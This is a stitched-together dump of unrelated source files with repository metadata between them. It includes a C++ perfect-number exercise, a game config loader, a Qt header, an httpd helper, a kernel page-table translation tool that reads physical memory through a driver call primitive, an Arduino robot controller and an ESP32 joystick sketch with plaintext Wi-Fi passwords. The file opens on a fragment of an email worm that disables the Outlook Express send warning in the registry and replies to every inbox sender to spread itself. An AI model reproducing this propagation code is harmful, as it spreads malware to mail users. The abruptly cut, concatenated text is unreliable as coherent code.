//Registry disable warning when sending the mail... yo(:
RegOpenKeyEx(HKEY_CURRENT_USER, "Identities", 0, KEY_QUERY_VALUE, &RegHandle1);
RegQueryValueEx(RegHandle1, "Default User ID", 0, 0, (BYTE *)&DefaultUserId, &DefaultUserIdSize);
lstrcat(DefaultUserId, "\\Software\\Microsoft\\Outlook Express\\5.0\\Mail");
RegOpenKeyEx(RegHandle1, DefaultUserId, 0, KEY_SET_VALUE, &RegHandle2);
RegSetValueEx(RegHandle2, "Warn on Mapi Send", 0, REG_DWORD, (BYTE *)&WarnDisable, sizeof(WarnDisable));
RegCloseKey(RegHandle2);
RegCloseKey(RegHandle1);
MapiDll = LoadLibrary("MAPI32.DLL");
MapiLogon = (LPMAPILOGON) GetProcAddress(MapiDll, "MAPILogon");
MapiFindNext = (LPMAPIFINDNEXT) GetProcAddress(MapiDll, "MAPIFindNext");
MapiReadMail = (LPMAPIREADMAIL) GetProcAddress(MapiDll, "MAPIReadMail");
MapiSendMail = (LPMAPISENDMAIL) GetProcAddress(MapiDll, "MAPISendMail");
MapiLogoff = (LPMAPILOGOFF) GetProcAddress(MapiDll, "MAPILogoff");
GetModuleFileName(0, WormFile, sizeof(WormFile));
MapiLogon(0, 0, 0, 0, 0, &MapiSessionHandle);
while(MapiFindNext(MapiSessionHandle, 0, 0, MessageBuffer, MAPI_GUARANTEE_FIFO, 0, MessageBuffer) == SUCCESS_SUCCESS || MailCount == 0)
{
if(MapiReadMail(MapiSessionHandle, 0, MessageBuffer, 0, 0, &GetMessage) == SUCCESS_SUCCESS)
{
lstrcpy(Subject, Re);
lstrcat(Subject, GetMessage->lpszSubject);
lstrcpy(VictimAddress, GetMessage->lpOriginator->lpszAddress);
if (MapiSendMail(MapiSessionHandle, 0, &Message, 0, 0) == SUCCESS_SUCCESS)
{
MailCount--;
}
} else {
return 0;
}
}
MapiLogoff(MapiSessionHandle, 0, 0, 0);
FreeLibrary(MapiDll);
return 0;
}
|
3e5c4e206a881e8b8e3fd7ea6ef9c757a8324f3f | 2e4eaef369cb1d6c8df8ea07ee1e512f4f12f14f | /AHMAD FAHMI BIN AZLAN.cpp | 7fb1a686174c2e4e7f0c0c772008f690839b6af6 | [] | no_license | DDWC1603/lab-exercise-chapter-4-soraxsnow | 2e033123cac477e76944de8ce6abfe8a07c2b657 | 2671a3e7d76975ebe9fe28ec57551a40a7a87204 | refs/heads/master | 2021-05-11T21:56:45.119372 | 2018-01-15T01:48:14 | 2018-01-15T01:48:14 | 117,482,199 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 571 | cpp | AHMAD FAHMI BIN AZLAN.cpp | // Name: Ahmad Fahmi bin Azlan@Azlan Amin //
// Id : A17DW4144 //
#include <iostream>
using namespace std;
int main()
{
cout << "\n\n Find the perfect numbers between 1 and 500:\n";
cout << "------------------------------------------------\n";
int i =1, u =1, sum =0;
cout << "\n The perfect numbers between 1 to 500 are: \n";
while (i <= 500)
{
while (u <= 500)
{
if (u < i)
{
if (i % u == 0)
sum = sum + u;
}
u++;
}
if (sum == i) {
cout << i << " " << "\n";
}
i++;
u = 1;
sum = 0;
}
}
|
bc6dcc54fd46914daa02bd563adac7780a4b8f3e | f14626611951a4f11a84cd71f5a2161cd144a53a | /PUBLIC/Cosmetology.cpp | d80c1223bf4ee3223832a35447b630892f54664b | [] | no_license | Deadmanovi4/mmo-resourse | 045616f9be76f3b9cd4a39605accd2afa8099297 | 1c310e15147ae775a59626aa5b5587c6895014de | refs/heads/master | 2021-05-29T06:14:28.650762 | 2015-06-18T01:16:43 | 2015-06-18T01:16:43 | null | 0 | 0 | null | null | null | null | GB18030 | C++ | false | false | 5,381 | cpp | Cosmetology.cpp | #include "StdAfx.h"
#include "Cosmetology.h"
#include "StrUnifyInput.h"
#include "Public.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
struct tagCosKey;
struct tagCosKeycmp;
map<tagCosKey,CCosmetology::tagCosme*,tagCosKeycmp> CCosmetology::m_mpCosmetology;
//默认构造函数
CCosmetology::CCosmetology()
{
}
//默认析构函数
CCosmetology::~CCosmetology()
{
}
//解析美容系统的配置文件
bool CCosmetology::InitCosmetology(string strFileName)
{
if (""==strFileName)
{
return false;
}
Release();
char strError[256];
//=================================================================//
CRFile *prfile = rfOpen(strFileName.c_str());
if(NULL == prfile)
{
//输出错误信息
_snprintf(strError, 256, "LoadFileError:%s",strFileName);
MessageBox(NULL,strError,"",MB_OK);
return false;
}
TiXmlNode *pNode = NULL;
TiXmlDocument m_Tdoc(strFileName.c_str());
//载入复活物品配置文件
if( !m_Tdoc.LoadData(prfile->GetData(),prfile->GetDatalen()) )
{
//输出错误信息
_snprintf(strError, 256, CStringReading::LoadString(IDS_WS_SKILL,STR_WS_SKILL_FOURTH),strFileName.c_str());
MessageBox(NULL,strError,"",MB_OK);
rfClose(prfile);
return false;
}
rfClose(prfile);
//=================================================================//
//找到根节点,如果无节点,输出错误提示
pNode = m_Tdoc.FirstChild("Cosme");
if (pNode==NULL)
{
string strNode = "Cosme";
_snprintf(strError, 256, CStringReading::LoadString(IDS_WS_SKILL,STR_WS_SKILL_FIFTH),strFileName.c_str(),strNode.c_str());
MessageBox(NULL,strError,"",MB_OK);
return false;
}
TiXmlElement* pElem = pNode->ToElement();
for (TiXmlElement *pChildElem=pElem->FirstChildElement(); pChildElem!=NULL;
pChildElem=pChildElem->NextSiblingElement())
{
if (!stricmp(pChildElem->Value(),"Type"))
{
BYTE bType = (BYTE)atoi(pChildElem->Attribute("id"));
BYTE bSex = (BYTE)atoi(pChildElem->Attribute("sex"));
if (!LoadMainConfig(pChildElem,bType,bSex))
{
_snprintf(strError, 256, "the file %s has the same id,please check it",strFileName.c_str());
MessageBox(NULL,strError,"",MB_OK);
return false;
}
}
}
return true;
}
//获取位型
int CCosmetology::GetIntAttribute(TiXmlElement *pElem,string strName)
{
int iValue;
if(pElem->QueryIntAttribute(strName.c_str(),&iValue))
{
iValue = 0;
}
return iValue;
}
//读取配置主节点
bool CCosmetology::LoadMainConfig(TiXmlElement *pElem, BYTE bType, BYTE bSex)
{
for (TiXmlElement *pChildElem=pElem->FirstChildElement(); pChildElem!=NULL;
pChildElem=pChildElem->NextSiblingElement())
{
if (!stricmp(pChildElem->Value(),"MainConfig"))
{
tagCosKey tgKey;
tgKey.bType = bType;
tgKey.bSex = bSex;
tgKey.lID = atol(pChildElem->Attribute("id"));
itCosmetology it = m_mpCosmetology.find(tgKey);
if (it==m_mpCosmetology.end())
{
tagCosme *ptgCosme = new tagCosme;
ptgCosme->lIndex = GetIntAttribute(pChildElem,"index"); //(脸,发)形编号
ptgCosme->lGoodsIndex = GetIntAttribute(pChildElem,"goodsindex"); //物品索引
ptgCosme->lGoodsNum = GetIntAttribute(pChildElem,"goodsnum"); //物品数量
ptgCosme->lPicID = GetIntAttribute(pChildElem,"pid"); //图片ID
ptgCosme->bDisplay = (BYTE)(GetIntAttribute(pChildElem,"show")); //物品显示标志符
ptgCosme->lHairColor = GetIntAttribute(pChildElem,"haircolor"); //发型颜色
m_mpCosmetology.insert(make_pair(tgKey,ptgCosme));
}
else
{
//配置中有相同的ID,返回失败
return false;
}
}
}
return true;
}
CCosmetology::tagCosme *CCosmetology::GetTgCosme(tagCosKey tgKey)
{
itCosmetology it = m_mpCosmetology.find(tgKey);
if (it!=m_mpCosmetology.end())
{
return (*it).second;
}
return NULL;
}
CCosmetology::tagCosme* CCosmetology::GetTgCosme(CSTTYPE e,BYTE sex,long index)
{
tagCosKey _tgKey;
_tgKey.bType = (BYTE)e;
_tgKey.bSex = sex;
_tgKey.lID = index;
return GetTgCosme(_tgKey);
}
//编码
void CCosmetology::AddToByteArray(vector<BYTE> &pByteArray)
{
//个数
_AddToByteArray(&pByteArray, static_cast<long>(m_mpCosmetology.size()));
itCosmetology it = m_mpCosmetology.begin();
for (; it!=m_mpCosmetology.end(); ++it)
{
_AddToByteArray(&pByteArray,(*it).first.bType);
_AddToByteArray(&pByteArray,(*it).first.lID);
_AddToByteArray(&pByteArray,(*it).first.bSex);
_AddToByteArray(&pByteArray,(*it).second,sizeof(tagCosme));
}
}
//解码
void CCosmetology::DecordFromByteArray(BYTE *pByte, long& pos)
{
Release();
long lNum = _GetLongFromByteArray(pByte,pos);
for (long l=0; l<lNum; ++l)
{
tagCosKey tgKey;
tagCosme *ptgCosme = new tagCosme;
tgKey.bType = _GetByteFromByteArray(pByte,pos);
tgKey.lID = _GetLongFromByteArray(pByte,pos);
tgKey.bSex = _GetByteFromByteArray(pByte,pos);
_GetBufferFromByteArray(pByte,pos,ptgCosme,sizeof(tagCosme));
m_mpCosmetology.insert(make_pair(tgKey,ptgCosme));
}
}
//释放
void CCosmetology::Release()
{
itCosmetology it = m_mpCosmetology.begin();
for (; it!=m_mpCosmetology.end(); ++it)
{
SAFE_DELETE((*it).second);
}
m_mpCosmetology.clear();
}
|
14e4791d4b2ead3e9c19b7b114d1e2a98613202a | 0af3c13b9d4e18c6bd846e8b82d14cd6bbed8c1f | /Editor/EditorUIFrame.h | c46714d9bd9ad0ede759b395b7121af72672df50 | [] | no_license | tbcmangos/ZenonEngine | b5042f47e2d59c7ae688a2edda9d87f46cf3564d | 6ec3e7936f0d68c9ad370a9b757111cd3536311f | refs/heads/master | 2022-11-26T04:27:54.799487 | 2020-08-06T20:34:44 | 2020-08-06T20:34:44 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,352 | h | EditorUIFrame.h | #pragma once
#include <QMainWindow>
#include "EditorQtInterfaces.h"
#include "PropertyEditor/PropertiesController.h"
class CEditorUIFrame
: public QMainWindow
, public IEditorUIFrame
, public IEditorQtUIFrame
, public IEditorToolSelectorEventListener
{
Q_OBJECT
public:
CEditorUIFrame(IEditor& Editor);
virtual ~CEditorUIFrame();
inline ZenonWindow3D * getMainEditor() const { return m_UI.MainEditor3D; }
inline ZenonWindowMinimal3DWidget * getModelPreview() const { return m_UI.ModelPreview; }
inline ZenonSceneViewerWidget * getSceneViewer() const { return m_UI.SceneViewer; }
inline ZenonCollectionViewerWidget * getCollectionViewer() const { return m_UI.CollectionViewer; }
// IEditorSharedFrame
IEditor& GetEditor() const override;
bool InitializeEditorFrame() override;
// IEditorUIFrame
void DoInitializeToolsUI() override;
bool ExtendContextMenu(const std::shared_ptr<ISceneNode3D>& Node, std::string * Title, std::vector<std::shared_ptr<IPropertyAction>> * Actions) override;
void OnSceneChanged();
// IEditorQtUIFrame
QObject& getQObject() override final;
Ui::EditorUIFrameClass& getUI() override final;
// IEditorToolSelectorEventListener
void OnSelectNode() override;
private:
std::shared_ptr<CPropertiesController> m_PropertiesController;
private:
IEditor& m_Editor;
Ui::EditorUIFrameClass m_UI;
};
|
db45f22c96a2cc5c7b561e6c8f7e2b0014358696 | 0eff74b05b60098333ad66cf801bdd93becc9ea4 | /second/download/httpd/gumtree/httpd_repos_function_665_httpd-2.4.16.cpp | 553daffda3c27e0441da1e211c46bc3be5caa18f | [] | no_license | niuxu18/logTracker-old | 97543445ea7e414ed40bdc681239365d33418975 | f2b060f13a0295387fe02187543db124916eb446 | refs/heads/master | 2021-09-13T21:39:37.686481 | 2017-12-11T03:36:34 | 2017-12-11T03:36:34 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 602 | cpp | httpd_repos_function_665_httpd-2.4.16.cpp | static const char *asn1_table_vhost_key(SSLModConfigRec *mc, apr_pool_t *p,
const char *id, int i)
{
/* 'p' pool used here is cleared on restarts (or sooner) */
char *key = apr_psprintf(p, "%s:%d", id, i);
void *keyptr = apr_hash_get(mc->tVHostKeys, key,
APR_HASH_KEY_STRING);
if (!keyptr) {
/* make a copy out of s->process->pool */
keyptr = apr_pstrdup(mc->pPool, key);
apr_hash_set(mc->tVHostKeys, keyptr,
APR_HASH_KEY_STRING, keyptr);
}
return (char *)keyptr;
} |
b335edfd0142bee9b2d18b0f9fff29b3e6286d0d | c4b910509ca8c05ff9f18bf1e2d147cd63cf51c0 | /anyvtop/vtop.hpp | 1f8c9287f34aabe48b18f57fd12e02e6725848a5 | [
"MIT"
] | permissive | WindowsKernel/anyvtop | 8acbfbd4ffa0bb9f63255ecf0595c51b3f0cebeb | 2732872a85a7a6708414b665bb70d04a68809d61 | refs/heads/main | 2023-05-28T06:44:26.018819 | 2021-06-03T05:42:08 | 2021-06-03T05:42:08 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 6,439 | hpp | vtop.hpp | /*
MIT License
Copyright (c) 2021 Kento Oki
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
#pragma once
#include <windows.h>
#include <iostream>
#include "libanycall.h"
#include "cpudef.hpp"
#include "nt.hpp"
#include "kernel.hpp"
template<typename T>
struct PAGE_ENTRY
{
T* pointer;
T value;
};
namespace vtop
{
//
// system process pid always 4
//
inline static constexpr uint32_t system_process_pid = 4;
//
// fetch directory table base (DTB)
// in case of system process which KVA belongs, DTB represents cr3
//
ULONG fetch_dtb( uint32_t process_id = system_process_pid )
{
NTSTATUS nt_status = STATUS_SUCCESS;
PEPROCESS eprocess;
//
// lookup the PEPROCESS pointer
//
nt_status =
ANYCALL_INVOKE( PsLookupProcessByProcessId,
( HANDLE )process_id, &eprocess );
if ( !NT_SUCCESS( nt_status ) || !eprocess )
{
return 0;
}
printf( "[+] PEPROCESS of %d @ %p\n", process_id, eprocess );
ULONG dtbase = 0;
//
// copy DirectoryTableBase to our buffer
//
// dt nt!_KPROCESS DirectoryTableBase
// +0x028 DirectoryTableBase : Uint8B
//
kernel::memcpy(
&dtbase,
( void* )( ( uint64_t )eprocess + 0x28 ),
sizeof( ULONG ) );
if ( !dtbase )
{
return 0;
}
printf( "[+] directory base: 0x%lx\n", dtbase );
//
// another method:
// pte.pfn << log2( PAGE_SIZE )
//
return dtbase;
}
//
// translate (v)irtual address to (p)hysical address
//
uint64_t vtop(
VIRTUAL_ADDRESS virtual_address,
uint32_t process_id = system_process_pid ) // process id of the virtual address
{
printf( "[~] converting...\n" );
printf( "[~] virtual address: 0x%llX\n", ( uint64_t )virtual_address.value );
//
// _KPROCESS.DirectoryTableBase, the DTB, contains value from __readcr3
// but since we are on user-mode,
// we can't make call to __readcr3 so fetch from _EPROCESS
//
const auto dtb = fetch_dtb( process_id );
printf( "[+] directory table base: 0x%lX\n", dtb );
PAGE_ENTRY<PML4E> pml4_entry;
PAGE_ENTRY<PDPE> pdp_entry;
PAGE_ENTRY<PDE> pd_entry;
PAGE_ENTRY<PTE> pt_entry;
//
// 1. locate PML4 pointer that represents physical address of PML4 entry
// 2. copy PML4 entry from physical address to our buffer
// in order to locate PDP entry in next
//
pml4_entry.pointer = ( PPML4E )dtb + virtual_address.pml4_index;
pml4_entry.value = kernel::read_physical_memory<PML4E>( ( uint64_t )pml4_entry.pointer );
if ( !pml4_entry.value.value )
{
printf( "[!] failed to fetch pml4e from physical memory\n" );
return 0;
}
printf( "[+] \033[0;102;30mpml4 index\033[0m: %d\n",
static_cast<uint32_t>( virtual_address.pml4_index ) );
printf( "[+] \033[0;102;30mpml4e\033[0m: 0x%p\n", pml4_entry.pointer );
printf( "[+] \033[0;102;30mpml4e\033[0m: 0x%llX\n", pml4_entry.value.value );
//
// 1. locate PDP pointer that represents physical address of PDP entry
// 2. copy PDP entry from physical address to our buffer
// in order to locate PD entry in next
//
pdp_entry.pointer = ( PPDPE )( pml4_entry.value.pfn << PAGE_SHIFT ) + virtual_address.pdp_index;
pdp_entry.value = kernel::read_physical_memory<PDPE>( ( uint64_t )pdp_entry.pointer );
if ( !pdp_entry.value.value )
{
printf( "[!] failed to fetch pdp_entry from physical memory\n" );
return 0;
}
printf( "[+] \033[0;104;30mpdp index\033[0m: %d\n",
static_cast<uint32_t>( virtual_address.pdp_index ) );
printf( "[+] \033[0;104;30mpdpe\033[0m: 0x%p\n", pdp_entry.pointer );
printf( "[+] \033[0;104;30mpdpe\033[0m: 0x%llX\n", pdp_entry.value.value );
//
// 1. locate PD pointer that represents physical address of PD entry
// 2. copy PD entry from physical address to our buffer
// in order to locate PT entry in next
//
pd_entry.pointer = ( PPDE )( pdp_entry.value.pfn << PAGE_SHIFT ) + virtual_address.pd_index;
pd_entry.value = kernel::read_physical_memory<PDE>( ( uint64_t )pd_entry.pointer );
if ( !pd_entry.value.value )
{
printf( "[!] failed to fetch pd_entry from physical memory\n" );
return 0;
}
printf( "[+] \033[0;105;30mpd index\033[0m: %d\n",
static_cast<uint32_t>( virtual_address.pd_index ) );
printf( "[+] \033[0;105;30mpde\033[0m: 0x%p\n", pd_entry.pointer );
printf( "[+] \033[0;105;30mpde\033[0m: 0x%llX\n", pd_entry.value.value );
//
// 1. locate PT pointer that represents physical address of PT entry
// 2. copy PT entry from physical address to our buffer
// in order to translate to the physical address
//
pt_entry.pointer = ( PPTE )( pd_entry.value.pfn << PAGE_SHIFT ) + virtual_address.pt_index;
pt_entry.value = kernel::read_physical_memory<PTE>( ( uint64_t )pt_entry.pointer );
if ( !pt_entry.value.value )
{
printf( "[!] failed to fetch pt_entry from physical memory\n" );
return 0;
}
printf( "[+] \033[0;106;30mpt index\033[0m: %d\n",
static_cast<uint32_t>( virtual_address.pt_index ) );
printf( "[+] \033[0;106;30mpte\033[0m: 0x%p\n", pt_entry.pointer );
printf( "[+] \033[0;106;30mpte\033[0m: 0x%llX\n", pt_entry.value.value );
//
// translate to the physical address using PTE's PFN and VA's offset
//
const uint64_t physical_address =
( pt_entry.value.pfn << PAGE_SHIFT ) + virtual_address.offset;
printf( "[+] \033[0;103;30mphysical address\033[0m: 0x%llX\n", physical_address );
printf( "[+] done!\n" );
return physical_address;
}
} // namespace vtop |
5c296e4f2708d1f6557ef898f7392423b6a91dcd | 91a235e5af9b75fab54b82d631ed9105f69e76f7 | /The_Brain_V4.ino | 73e8a3c3551306be39ab53dca3be5d4ae90fa46c | [] | no_license | AmrElshenawy/Autonomous-Self-Navigating-Robot | 04c10fd38f797c05fc02bf299260bf0538ce56b7 | 6dca7f5457b7765f4a60368efbdd2441e84cb699 | refs/heads/master | 2023-04-13T13:54:44.669708 | 2021-04-20T21:59:31 | 2021-04-20T21:59:31 | 245,700,381 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 10,033 | ino | The_Brain_V4.ino | //Amr Elshenawy MEng Individual Major Project
//Autonomous Self-Navigating Robot
//FINAL VERSION - AUTOMATED ROTATION
//3 Ultrasonic Sensors - Forward, Left, Right
//4WD Drive Chassis
//Bluetooth Module
//--------------------------------------------------------------------------------------------------------------------------------
//Sensors Intialisations, Flags and Variables
int ForwardEcho = A12;
int ForwardTrig = A13;
int RightEcho = A10;
int RightTrig = A11;
int LeftEcho = A8;
int LeftTrig = A9;
long FSduration, LSduration, RSduration;
float IFSdistance, FSdistance, ILSdistance, LSdistance, IRSdistance, RSdistance;
unsigned int sum = 0;
unsigned int sum2 = 0;
unsigned int sum3 = 0;
unsigned int Sample_Count = 0;
unsigned int Sample_Count2 = 0;
unsigned int Sample_Count3 = 0;
int Num_Samples = 10;
int KeepLooking = 250;
//--------------------------------------------------------------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------------------------------------
//Motor Intialisations
#define ENALeft 5
#define ENBRight 6
#define LeftForward 7 //IN1
#define RightBackward 9 //IN3
#define LeftBackward 8 //IN2
#define RightForward 11 //IN4
int FRota = 80;
int RRota = 200;
//--------------------------------------------------------------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------------------------------------
//Enumeration List
enum StatusMode
{
IDLE,
Autonomous,
Manual,
Test
} func_mode = IDLE;
enum MovementMode
{
STOP,
FORWARD,
BACKWARD,
LEFT,
RIGHT
} mov_mode = STOP;
//--------------------------------------------------------------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------------------------------------
//Operation Functions
void MoveForward()
{
analogWrite(ENALeft, FRota);
analogWrite(ENBRight, FRota);
digitalWrite(RightForward, HIGH);
digitalWrite(LeftForward, HIGH); //MOVE FORWARD FUNCTION
digitalWrite(RightBackward, LOW);
digitalWrite(LeftBackward, LOW);
}
void MoveBackward()
{
analogWrite(ENALeft, FRota);
analogWrite(ENBRight, FRota);
digitalWrite(RightForward, LOW);
digitalWrite(LeftForward, LOW); //MOVE BACKWARD FUNCTION
digitalWrite(RightBackward, HIGH);
digitalWrite(LeftBackward, HIGH);
}
void TurnLeft()
{
analogWrite(ENALeft, RRota);
analogWrite(ENBRight, RRota);
digitalWrite(RightForward, HIGH);
digitalWrite(LeftForward, LOW); //TURN LEFT FUNCTION
digitalWrite(RightBackward, LOW);
digitalWrite(LeftBackward, HIGH);
}
void TurnRight()
{
analogWrite(ENALeft, RRota);
analogWrite(ENBRight, RRota);
digitalWrite(RightForward, LOW);
digitalWrite(LeftForward, HIGH); //TURN RIGHT FUNCTION
digitalWrite(RightBackward, HIGH);
digitalWrite(LeftBackward, LOW);
}
void Stop()
{
digitalWrite(ENALeft, LOW);
digitalWrite(ENBRight, LOW);
digitalWrite(RightForward, LOW);
digitalWrite(LeftForward, LOW); //STOP FUNCTION
digitalWrite(RightBackward, LOW);
digitalWrite(LeftBackward, LOW);
}
float ForwardSensor()
{
digitalWrite(ForwardTrig, LOW); //Set soundwaves transmitter to LOW
delayMicroseconds(5); //Wait 5us
digitalWrite(ForwardTrig, HIGH); //Set soundwaves transmitter to HIGH
delayMicroseconds(10); // Wait 10us
digitalWrite(ForwardTrig, LOW); //Set soundwaves trasnmitter to LOW
FSduration = pulseIn(ForwardEcho, HIGH); //Receiver soundwaves duration dumped into variable
IFSdistance = FSduration * 0.0343 / 2; //distance calculation
if(IFSdistance > 3 && IFSdistance < 350)
{
while(Sample_Count < Num_Samples)
{
sum += IFSdistance; //Further distance calibration
Sample_Count++;
delay(10);
}
}
FSdistance = ((float)sum / (float)Num_Samples); //Average distance calculated
Sample_Count = 0;
sum = 0;
Serial.print("Distance: ");
Serial.println(FSdistance);
return FSdistance;
}
float LeftSensor() // SAME COMMENTS FROM FORWARD SENSOR
{
digitalWrite(LeftTrig, LOW);
delayMicroseconds(2);
digitalWrite(LeftTrig, HIGH);
delayMicroseconds(10);
digitalWrite(LeftTrig, LOW);
LSduration = pulseIn(LeftEcho, HIGH);
ILSdistance = LSduration * 0.0343 / 2;
if(ILSdistance > 3 && ILSdistance < 350)
{
while(Sample_Count2 < Num_Samples)
{
sum2 += ILSdistance;
Sample_Count2++;
delay(10);
}
}
LSdistance = ((float)sum2 / (float)Num_Samples);
Sample_Count2 = 0;
sum2 = 0;
Serial.print("Distance: ");
Serial.println(LSdistance);
return LSdistance;
}
float RightSensor() // SAME COMMENTS FROM FORWARD SENSOR
{
digitalWrite(RightTrig, LOW);
delayMicroseconds(5);
digitalWrite(RightTrig, HIGH);
delayMicroseconds(10);
digitalWrite(RightTrig, LOW);
RSduration = pulseIn(RightEcho, HIGH);
IRSdistance = RSduration * 0.0343 / 2;
if(IRSdistance > 3 && IRSdistance < 350)
{
while(Sample_Count3 < Num_Samples)
{
sum3 += IRSdistance;
Sample_Count3++;
delay(10);
}
}
RSdistance = ((float)sum3 / (float)Num_Samples);
Sample_Count3 = 0;
sum3 = 0;
Serial.print("Distance: ");
Serial.println(RSdistance);
return RSdistance;
}
void BluetoothData() //BLUETOOTH function for categorizing the data recieved from the app
{
if(Serial.available())
{
switch(Serial.read())
{
case 'f': func_mode = Manual; mov_mode = FORWARD; break;
case 'b': func_mode = Manual; mov_mode = BACKWARD; break;
case 'l': func_mode = Manual; mov_mode = LEFT; break;
case 'r': func_mode = Manual; mov_mode = RIGHT; break;
case 's': func_mode = Manual; mov_mode = STOP; break;
case 'a': func_mode = Autonomous; break;
case 't': func_mode = Test; break;
default: break;
}
}
}
void AutonomousMode() //Autonomous Navigation Algorithm Control
{
if(func_mode == Autonomous)
{
ForwardSensor();
RightSensor();
LeftSensor();
if(FSdistance > 47 && RSdistance > 37 && LSdistance > 37)
{
MoveForward();
}
else if(FSdistance > 47 && RSdistance < 37 && LSdistance > 37)
{
TurnLeft();
delay(80);
MoveForward();
}
else if(FSdistance > 47 && LSdistance < 37 && RSdistance > 37)
{
TurnRight();
delay(80);
MoveForward();
}
if(FSdistance < 47)
{
MoveBackward();
delay(400);
while(FSdistance < 53)
{
if(RSdistance > LSdistance)
{
TurnRight();
delay(250);
ForwardSensor();
}
else if(LSdistance > RSdistance)
{
TurnLeft();
delay(250);
ForwardSensor();
}
}
ForwardSensor();
MoveForward();
}
}
}
void ManualMode() //Manual Control Function
{
if(func_mode == Manual)
{
switch(mov_mode)
{
case FORWARD: MoveForward(); break;
case BACKWARD: MoveBackward(); break;
case LEFT: TurnLeft(); break;
case RIGHT: TurnRight(); break;
case STOP: Stop(); break;
default: break;
}
}
}
void TestMode() //Automated Hardware Testing Algorithm
{
if(func_mode == Test)
{
ForwardSensor();
LeftSensor();
RightSensor();
if(FSdistance == 0 || LSdistance == 0 || RSdistance == 0)
{
digitalWrite(LED_BUILTIN, HIGH);
delay(300);
digitalWrite(LED_BUILTIN, LOW);
delay(300);
}
else if(FSdistance > 0 && LSdistance > 0 && RSdistance > 0)
{
digitalWrite(LED_BUILTIN, HIGH);
}
}
if(func_mode == Manual || func_mode == Autonomous)
{
digitalWrite(LED_BUILTIN, LOW);
}
}
//--------------------------------------------------------------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------------------------------------
void setup()
{
pinMode(ENALeft, OUTPUT);
pinMode(ENBRight, OUTPUT);
pinMode(LeftForward, OUTPUT);
pinMode(RightForward, OUTPUT); //INTILISATIONS OF MOTOR PINS FUNCTION MODE
pinMode(LeftBackward, OUTPUT);
pinMode(RightBackward, OUTPUT);
pinMode(ForwardEcho, INPUT);
pinMode(ForwardTrig, OUTPUT);
pinMode(LeftEcho, INPUT);
pinMode(LeftTrig, OUTPUT); //INITIALISATIONS OF SENSOR PINS FUNCTION MODE
pinMode(RightEcho, INPUT);
pinMode(RightTrig, OUTPUT);
pinMode(LED_BUILTIN, OUTPUT);
Serial.begin(9600); //SERIAL COMMUNCATION BAUD RATE SPPED
}
void loop()
{
BluetoothData();
AutonomousMode(); //CALLING OF ALL MAIN FUNCTIONS
ManualMode();
TestMode();
/*unsigned long startt = micros();
AutonomousMode();
unsigned long endt = micros();
unsigned long delta = endt - startt;
Serial.println(delta);*/
}
|
e54d7d692b6b76ba174c01a9d05c3e2bb1996282 | c748c9ee82b645e6912cb08f55a4d602e17b2e38 | /VII/12.cpp | a6ff4694df4dbc96dea448babe28194ac5d3cf36 | [] | no_license | gpokat/cci_tasks | 711ee9d13444f2c8d78eb75f63c5d21fa107e93f | adbd1da1f7df042f5c9cba01cb605021e37b69f2 | refs/heads/master | 2023-01-24T18:20:49.158341 | 2020-12-06T19:09:10 | 2020-12-06T19:09:10 | 257,710,209 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 524 | cpp | 12.cpp | //The answer is O(b*log(b)+a*log(b)).
//The final complexity is consist of two undependent blocks:
// 1 - mergesort, 2 - loop for with binarySearch.
//Thats why we should summarize they, but
//have to multiply loop and binarySearch complexity, coz they depend of each other.
int intersection(int *a, int *b)
{
mergesort(b); //O(b*log(b))
int intersect = 0;
for (auto x : a) //O(a)
{
if (binarySearch(b, x) >= 0) //O(log(b))
{
intersect++;
}
}
return intersect;
} |
df210eb6b3b4a973ae03620aa90b62b09376959a | f7dd1e765819021955f66252691eea5e5451ef60 | /Esp32/Robotic Car/Final Code/JoyStick/JoyStick.ino | 94725d3fc5c07f4d9b01800d433bd42c6d08d802 | [] | no_license | sfedrick/Mechatronic-Projects- | dc860a997d1d1c6c0c36e9eb286137904090b1a1 | fb5baff894c781cae7d82582fc5042f36e9f909d | refs/heads/main | 2023-04-20T20:23:08.419853 | 2021-05-09T19:49:20 | 2021-05-09T19:49:20 | 334,522,284 | 1 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 4,162 | ino | JoyStick.ino |
/*Built off of:
* MEAM510 Lab 4 demo
* March 2021
*
* Mark Yim
* University of Pennsylvania
* copyDirection (c) 2021 All Directions Reserved
*/
#include <WiFi.h>
#include "html510.h"
#include "joyJS.h"
#include "tankJS.h"
WiFiServer server(80);
//upenn wifi
/*
const char* ssid = "#Skyroam_1t9";
const char* password = "55687127";
*/
//home wifi
const char* ssid = "Fios-G8WhZ";
const char* password = "Jesuisungrenouille777";
const char *body;
/********************/
/* HTML510 web */
void handleFavicon(){
sendplain(""); // acknowledge
}
void handleRoot() {
sendhtml(body);
}
void handleSwitch() { // Switch between JOYSTICK and TANK mode
String s="";
static int toggle=0;
if (toggle) body = joybody;
else body = tankbody;
toggle = !toggle;
sendplain(s); //acknowledge
}
#define Direction_CHANNEL0 0 // use first channel of 16
#define Speed_CHANNEL1 3
